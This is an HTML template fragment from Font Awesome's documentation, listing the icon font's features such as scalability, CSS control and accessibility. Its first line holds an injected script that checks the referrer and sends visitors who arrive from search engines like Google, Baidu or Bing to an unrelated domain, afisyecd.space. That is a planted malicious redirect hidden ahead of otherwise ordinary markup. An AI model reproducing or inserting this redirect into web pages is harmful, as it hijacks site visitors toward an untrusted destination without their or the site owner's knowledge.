001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><section id="why" class="feature-list">
002: <div class="row">
003: <div class="col-md-4 col-sm-6">
004: <h4><i class="fa fa-flag" aria-hidden="true"></i> One Font, {{ icons | size }} Icons</h4>
005: In a single collection, Font Awesome is a pictographic language of web-related actions.
006: </div>
007: <div class="col-md-4 col-sm-6">
008: <h4><i class="fa fa-ban" aria-hidden="true"></i> No JavaScript Required</h4>
009: Fewer compatibility concerns because Font Awesome doesn't require JavaScript.
010: </div>
011: <div class="col-md-4 col-sm-6">
012: <h4><i class="fa fa-arrows-alt" aria-hidden="true"></i> Infinite Scalability</h4>
013: Scalable vector graphics means every icon looks awesome at any size.
014: </div>
015: <div class="col-md-4 col-sm-6">
016: <h4><i class="fa fa-microphone" aria-hidden="true"></i> Free, as in Speech</h4>
017: Font Awesome is completely free for commercial use. Check out the <a href="{{ page.relative_path }}license/">license</a>.
018: </div>
019: <div class="col-md-4 col-sm-6">
020: <h4><i class="fa fa-pencil" aria-hidden="true"></i> CSS Control</h4>
021: Easily style icon color, size, shadow, and anything that's possible with CSS.
022: </div>
023: <div class="col-md-4 col-sm-6">
024: <h4><i class="fa fa-eye" aria-hidden="true"></i> Perfect on Retina Displays</h4>
025: Font Awesome icons are vectors, which mean they're gorgeous on high-resolution displays.
026: </div>
027: <div class="col-md-4 col-sm-6">
028: <h4><i class="fa fa-gamepad" aria-hidden="true"></i> Plays Well with Others</h4>
029: Originally designed for <a href="{{ site.bootstrap.url }}">Bootstrap</a>, Font Awesome works great with all frameworks.
030: </div>
031: <div class="col-md-4 col-sm-6">
032: <h4><i class="fa fa-desktop" aria-hidden="true"></i> Desktop Friendly</h4>
033: To use on the desktop or for a complete set of vectors,
034: check out the <a href="{{ page.relative_path }}cheatsheet/">cheatsheet</a>.
035: </div>
036: <div class="col-md-4 col-sm-6">
037: <h4><i class="fa fa-wheelchair" aria-hidden="true"></i> Accessibility-minded</h4>
038: Font Awesome <i class="fa fa-heart" aria-hidden="true"></i><span class="sr-only">loves</span> screen readers and
039: <a href="{{ page.relative_path }}accessibility/">helps make your icons accessible</a> on the web.
040: </div>
041: </div>
042: </section>
043:
044:
045: